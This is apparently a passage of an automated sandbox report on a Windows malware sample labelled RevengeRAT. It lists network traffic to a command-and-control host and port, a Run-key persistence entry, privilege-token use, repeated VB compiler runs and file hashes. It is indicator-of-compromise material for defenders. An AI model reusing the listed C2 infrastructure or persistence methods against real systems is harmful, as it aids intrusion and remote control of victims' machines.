| US | 8.8.8.8:53 | nlbmfsyplohyaicmxhum.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nlbmfsyplohyaicmxhum.com | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
memory/4920-0-0x00000000754EF000-0x00000000754F2000-memory.dmp
memory/4920-2-0x00000000754A0000-0x0000000075521000-memory.dmp
memory/4920-1-0x00000000754A0000-0x0000000075521000-memory.dmp
memory/4920-3-0x00000000754A0000-0x0000000075521000-memory.dmp
memory/4920-4-0x00000000754EF000-0x00000000754F2000-memory.dmp
memory/2604-6-0x0000000000B60000-0x0000000000B8B000-memory.dmp
memory/4920-8-0x00000000754A0000-0x0000000075521000-memory.dmp
memory/2604-9-0x0000000000B60000-0x0000000000B8B000-memory.dmp
memory/2604-11-0x0000000000B60000-0x0000000000B8B000-memory.dmp
memory/2604-12-0x0000000000B60000-0x0000000000B8B000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
155s
Command Line
Signatures
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\file.exe" | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cfonx6_b.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD5B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFC6FEA92447409BA52C6AF995BF277.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vjuqjhda.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1000FDDEE19F471FAC753B9F6957FB13.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9vxa6b40.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF30.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8CAFC5AFBC040D1907EAD5AE89DE3A2.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFBD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6367570A20AB4D0EAFB8A2E12AFA3AA4.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc34F0F6707CD4452FA446A2BB5542B741.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF622CE03E80B4583A1E934F98A9591D.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES105.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc52E7355544C1497E83611B5748B758.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\els-cvvq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCAD5E4C644E242F4828C7A1F581E84F.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w-vdve3v.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4096DB147B10453A98917E85DB63EAF.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6sywpk7h.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc273C6A3A5576456A99FBC6AB83E3F6A.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lbxakjmm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6331EDE1F6164333905634FAD2D9E6A7.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wup2lvx9.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc39DCF8D5AE70476C9C21A71D6D52D9CB.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES347.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc20603B019A994E2C847E4CF5B991EE8.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ne6ziyia.cmdline"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES395.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA543F43955F54B3690886446EE283715.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tbu-g441.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBB16B9F2BA2D47D1B76FA638B94E071.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\svdnayzc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES450.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc15289FA58604460AAF3C89C8BF82BA1.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t4i3kkmz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4ED.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc89BE6EAE55824FC1A9406FF5BDCC49C1.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mkksb62a.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0DA717518BE4A4B8A14AF30CC623DB0.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tfizahdg.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES599.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE88B964A44F94E778DB2C18F2C5DAF37.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_qi_rytt.cmdline"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc72FC0E95F2A14D40BBEAC8A11AF3508.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hhtfuq8s.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES654.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDBDE31BCB5C4B6FADE7CB1A1226D9DF.TMP"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-njozgcv.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc376D6E2269534151AD512469A8E290.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yj233.e1.luyouxia.net | udp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
| CN | 123.99.198.201:20645 | yj233.e1.luyouxia.net | tcp |
Files
memory/4412-0-0x00007FFE58365000-0x00007FFE58366000-memory.dmp
memory/4412-1-0x000000001B9C0000-0x000000001BE8E000-memory.dmp
memory/4412-2-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
memory/4412-3-0x000000001B410000-0x000000001B4B6000-memory.dmp
memory/4412-4-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
memory/4412-5-0x000000001BF50000-0x000000001BFB2000-memory.dmp
memory/4412-6-0x00007FFE58365000-0x00007FFE58366000-memory.dmp
memory/4412-7-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
memory/4412-10-0x000000001D150000-0x000000001D1EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cfonx6_b.cmdline
| MD5 | a293ad07e82dcbb54c2f57551ade5bff |
| SHA1 | d4aa6b89ce051f0c1e74c43508e3808bbe1f5e8c |
| SHA256 | 993cb0db255626146a10d11b489352545e83512e7cc3e2c398046c2ec3ef02a4 |
| SHA512 | 65098ccb0ccaa5b50e6bf440acddac60f6e1f83fc0f778d0952475977fa3001670710bb9553287e56942e1c04f51288291d5da9dd6e084c08da3bb90b551d200 |
C:\Users\Admin\AppData\Local\Temp\cfonx6_b.0.vb
| MD5 | 52ddcb917d664444593bbd22fc95a236 |
| SHA1 | f87a306dffbfe5520ed98f09b7edc6085ff15338 |
| SHA256 | 5c55dcac794ff730b00e24d75c2f40430d90b72c9693dd42c94941753a3d657d |
| SHA512 | 60dafb21f44cbf400e6f8bc5791df9a8d497da6837fb1a453fda81b324ac6f70fb9ec0efb1e7649b9bed0dfe979016360f3bcfef543d7e9432a97b96c8b9fd35 |
memory/2408-17-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
C:\ProgramData\RevengeRAT\vcredist2010_x64.log-MSI_vc_red.msi.ico
| MD5 | c350868e60d3f85eb01b228b7e380daa |
| SHA1 | 6c9f847060e82fe45c04f8d3dab2d5a1c2f0603e |
| SHA256 | 88c55cc5489fc8d8a0c0ace6bfb397eace09fba9d96c177ef8954b3116addab7 |
| SHA512 | 47555d22608e1b63fbf1aacee130d7fc26be6befaa9d1257efb7ad336373e96878da47c1e1e26902f5746165fc7020c6929a8a0b54d5ad1de54d99514cc89d85 |
C:\Users\Admin\AppData\Local\Temp\RESFD5B.tmp
| MD5 | e4b948c1dacd2e5a462d83e722baa01d |
| SHA1 | d5f0d762bbb3d2f6aba9443a2fa1999a9c5d2cf4 |
| SHA256 | d1ae8d87b507249acf9ba3b1d22dd33820568af64477c3d35bb5a9eb79127efb |
| SHA512 | 47ea578945cc5d3210bb1dd68ad7fbfe3e374cb83e6809ded497e312cfd1dc11ee9e020a15e03d209bd5d8c21aba5f4ad0a1ae329efd2931a7c684e36c9b413f |
C:\Users\Admin\AppData\Local\Temp\vbcEFC6FEA92447409BA52C6AF995BF277.TMP
| MD5 | 7092dd0251b89b4da60443571b16fa89 |
| SHA1 | 08cb42f192e0a02730edf0dfa90f08500ea05dd2 |
| SHA256 | 2aa88b69c033bd712f9752eefa5624f534b915bb5dada74133d2ac0c67beebf7 |
| SHA512 | 7067f485062be4fea3d52815e4dbdad50b1c53c30b5b354d64ddf4d5126788d169b90bba26dec25ecbf40e23ea59991d149e12859838e6b10028be0c86c5af7a |
memory/2408-26-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vjuqjhda.cmdline
| MD5 | bbbb334a727989d46da96e8cd41260d8 |
| SHA1 | 95e7761aad00cbf20ed9cddeba90f2ebfe2e6d24 |
| SHA256 | b011f588aece74fcd61bbe9edca12ae91c1de8942f7c90e86c684fe51f01fbd1 |
| SHA512 | 2a041445632a5134015376539652d4bbf49c215f12e241c0f666e37c6d5b200a448a7c602876f40f88915d2a74a686c120ab9153f2014c1711351c110b52a05c |
C:\ProgramData\RevengeRAT\vcredist2010_x64.log.ico
| MD5 | 64f9afd2e2b7c29a2ad40db97db28c77 |
| SHA1 | d77fa89a43487273bed14ee808f66acca43ab637 |
| SHA256 | 9b20a3f11914f88b94dfaa6f846a20629d560dd71a5142585a676c2ef72dc292 |
| SHA512 | 7dd80a4ed4330fe77057943993a610fbd2b2aa9262f811d51f977df7fbcc07263d95c53e2fb16f2451bd77a45a1569727fbf19aeded6248d57c10f48c84cb4da |
C:\Users\Admin\AppData\Local\Temp\vjuqjhda.0.vb
| MD5 | 31e957b66c3bd99680f428f0f581e1a2 |
| SHA1 | 010caae837ec64d2070e5119daef8be20c6c2eae |
| SHA256 | 3e32c4b27f7a5840edc2f39d3fc74c2863aa2dfd9a409f1f772b8f427091a751 |
| SHA512 | 6e61d77c85c1bf3fd0c99630156e0390f9a477b4df0e46218054eae65bee7766443905f48e3f3c7dec72b3fb773f758cf175df54f1ed61ac266469579f3997af |
C:\Users\Admin\AppData\Local\Temp\RESFE17.tmp
| MD5 | d27bfa10a075d62395fc6a5c93ea6a86 |
| SHA1 | f9aef98633010231c4b4e7cb5a8f225a1d14e665 |
| SHA256 | e87368c5266ab2caf0377171a97c0323426e4318b702efbd91336de131e478f0 |
| SHA512 | cf633c4f51daa712510881acd2ddf324199c6c8461d03c44e5255862a44e1f50b148797d9a545c6e572019c65024da746b5ad988db923fcc7708b96ddbc2d4f4 |
memory/376-41-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vbc1000FDDEE19F471FAC753B9F6957FB13.TMP
| MD5 | 0fe8a8eff02f77e315885b53503483a8 |
| SHA1 | 953a58a0ff6736967270494a986aca7b5c490824 |
| SHA256 | 2d2c202dfa06961e1fad395fe08f9caa4b1004f71a0c37457581fa095229afba |
| SHA512 | e0fbfcb9a2db833bea58e5ed923f93689ee598c76f27fb57e19d9a7f110369035f00c3d0d4f229997aeb7b3dd38a24a5a76d55f66f35040fe986f31d8f79a7af |
memory/376-43-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9vxa6b40.cmdline
| MD5 | ec0a17d4fe193aec1fd14b42eb9c0ae2 |
| SHA1 | ade15872cdce3bf140af7c55c25a52ba804e454a |
| SHA256 | c055eeeee0428292e6296c535079a7e0c7fd3800cab2f2e53ffbc88e5b8cd7a3 |
| SHA512 | e184ffa7e3c7d54046789ec76847a6d732dd2c76bbf4840f85601db878113f1e0d7864b2b369b43c4b696dbd568ae581225e0a96754c19c2d7392cc2fffdad80 |
C:\Users\Admin\AppData\Local\Temp\9vxa6b40.0.vb
| MD5 | 0c699ac85a419d8ae23d9ae776c6212e |
| SHA1 | e69bf74518004a688c55ef42a89c880ede98ea64 |
| SHA256 | a109cb0ae544700270ad4cb1e3e45f7f876b9cfac5f2216875c65235502982fe |
| SHA512 | 674e3f3c24e513d1bb7618b58871d47233af0a450f1068762e875277bbddf6c4f78245988c96e907dbbf3aafb5ff59e457528b3efa8e0a844f86a17a26d4f3d6 |
C:\Users\Admin\AppData\Local\Temp\RESFF30.tmp
| MD5 | a19719e2a42da8dd13dd1c2d2ebd1cff |
| SHA1 | 39de108f9b4422f80bde6343ebbd667f6dc87329 |
| SHA256 | 55a2a1d4284c99c446b1b533f26a42a5992acc72efd4131d523783172bd1b198 |
| SHA512 | d3ee8f75a2a281a16eb5ddada1194ab84f5e0a5828bf4a68c098a2379543d36cf356ffbb524747c443a068a5a2e1bc5197b7139d4fdbd67360c9c28f574d503b |
C:\Users\Admin\AppData\Local\Temp\vbc8CAFC5AFBC040D1907EAD5AE89DE3A2.TMP
| MD5 | bb7c2818b20789e4b46db3b54dbbbb12 |
| SHA1 | b262ea7343363caae54bcce98e96e163cdf4822d |
| SHA256 | a944a5a52b5edfd19415c068a810b7249e5b5622d8faeee5d36f3fcb2462de67 |
| SHA512 | b101eb7a02d1911adee23bd63f5dbc84490b498583b802b4db0ab763de2c6abcbbb1bd28b17f9ad24e094e51bc3614bcf09c3a72841c500a9ae8d57e02a211ba |
C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.cmdline
| MD5 | 8186e4024208d1c914553506fab0dd04 |
| SHA1 | df87382e8d377fef2e7ff0a908db55e384eb8eba |
| SHA256 | 983bc8404b4f410853c91e38a1d57390d481994bad4d392df3d42dfa1bd8a257 |
| SHA512 | d297108b4f9306fa8bbf5fd8f233fc1afadc1c892638e91450e0e4889cd36f4f15bce28988fd942179d5dbdb5f758f8aa6e77e21f17da205ba1912d3c92f9967 |
C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.0.vb
| MD5 | 3b4aed436aadbadd0ac808af4b434d27 |
| SHA1 | f8711cd0521a42ac4e7cb5fc36c5966ff28417b6 |
| SHA256 | ee55ee594a9bb7acee0dfaa9aaa31ebc044e3090b5a68baef63ddd2f6493d3a6 |
| SHA512 | 6ca8a69f31876db620e8818d896257d3683dcf859841afa3ba7b83ae57ce67c47b98b4e44c449b02eb789b683b840e769857b10cf16a5a5882683e96f65ab5ef |
C:\Users\Admin\AppData\Local\Temp\vbc6367570A20AB4D0EAFB8A2E12AFA3AA4.TMP
| MD5 | 83005fc79370bb0de922b43562fee8e6 |
| SHA1 | d57a6f69b62339ddadf45c8bd5dc0b91041ea5dc |
| SHA256 | 9d8d4560bcacb245b05e776a3f2352e6dbecd1c80ac6be4ce9d6c16bc066cd9c |
| SHA512 | 9888bf670df3d58880c36d6d83cb55746111c60e3949ec8a6b6f773a08c96d7d79305192c5ad9d7c6689e93770880a5be56968bd12868b8b5d354bf5b39bee05 |
C:\Users\Admin\AppData\Local\Temp\RESFFBD.tmp
| MD5 | 63f265524d149878bd62a9eb7c679966 |
| SHA1 | 1dda74c88aec18b241bbf62f3ded9c80b38083b3 |
| SHA256 | c3b4bf2e271132eda02af486ecc540937f6bbe6244abb691ad24ad9871adc037 |
| SHA512 | df44a6650faea8346dad8d686eaa8a8b1c0a0e7802fac2069afd90c104aafbe3b3a5e689bedde5c190de0d151adbb3c6622c7621c891df5b2a965aead75aa8be |
C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.cmdline
| MD5 | 955372532f8f49f04c49ed9bc40f380c |
| SHA1 | 476489fffef161ef1e2b6ddf02567e48b4e40d64 |
| SHA256 | a1627254a1d75f99046b1fad7e63fdc942a9c0d719a3da9893a30082a0c5bcf0 |
| SHA512 | 9df3c5d5ffb7eb9a5f586d1a8f2af89e1e9727f1562e0f7e7eea9ebf5418c35161fc5b91108bcb7e5aea1fc754e1fec7c750e14a79e03ff2ae8dba73219ab12f |
C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.0.vb
| MD5 | 3cbba9c5abe772cf8535ee04b9432558 |
| SHA1 | 3e0ddd09ad27ee73f0dfca3950e04056fdf35f60 |
| SHA256 | 946d0a95bf70b08e5b5f0005ff0b9ad4efe3b27737936f4503c1a68a12b5dc36 |
| SHA512 | c3c07c93011dc1f62de940bc134eb095fa579d6310bd114b74dd0ae86c98a9b3dd03b9d2af2e12b9f81f6b04dc4d6474bd421bce2109c2001521c0b32ae68609 |
C:\Users\Admin\AppData\Local\Temp\vbc34F0F6707CD4452FA446A2BB5542B741.TMP
| MD5 | 97ea389eab9a08a887b598570e5bcb45 |
| SHA1 | 9a29367be624bb4500b331c8dcc7dadd6113ff7e |
| SHA256 | ab2e9e4fa0ade3a234fb691e1043822f23b6642a03bf355e8a94bbe648acd402 |
| SHA512 | 42ab57f66062848ed8ed5384f3e3beca0d446fa1889f2960e349271ccd72f80632b7c372d11a7cf3e9da8c1119668bc748ac663def652b044101f2f31e398a36 |
C:\Users\Admin\AppData\Local\Temp\RES49.tmp
| MD5 | aa0768d4c00ef3ebee79395b3254daf6 |
| SHA1 | a271d9e516b865136a8bf0f9d1799b04ee23c1bb |
| SHA256 | 6d4ddd371042983872bbf6bc7d4d804eb6498ae81a49aba5841df8717b44c6bc |
| SHA512 | 3e33f8f3d188b52448dad578f93cb7e421184d678b3b52c836d0ff85676c94c492f6f840e70123430bd96b63fa4d21d8eca5d71ae0e6221d4fb49277a9d4f046 |
C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.cmdline
| MD5 | 6ca71efc2bc7de4bb47c8245c97b7897 |
| SHA1 | f39ecdff92dc7301188c90c9435d60b9fbfad29a |
| SHA256 | bb848a7421a6dbe0aa4b4997a6bbb356091dca37af6eae8f0381513e1bf38fb4 |
| SHA512 | 279bc41661e907449d66488e93d2562fb134d096502bb93369a948f367813707e2a528074196ccc135ae87038c22f7a4903ea139a656bd4c998d19e762e28963 |
C:\Users\Admin\AppData\Local\Temp\vbcF622CE03E80B4583A1E934F98A9591D.TMP
| MD5 | bd6b22b647e01d38112cdbf5ff6569a1 |
| SHA1 | 1d5267e35bd6b3b9d77c8ba1aca7088ad240e2b9 |
| SHA256 | ff30b5f19155f512e7122d8ab9964e9edb148d39c0a8eb09f4b39234001f5a6e |
| SHA512 | 08c7f1400f1a3cd4e1442152ef239a18dda7daac61f4c0b0ff461c2264949b3dcd6227cbca39ff3eef39345e001f89c1ca6702065d1b9bb1659f2cf48b299a9f |
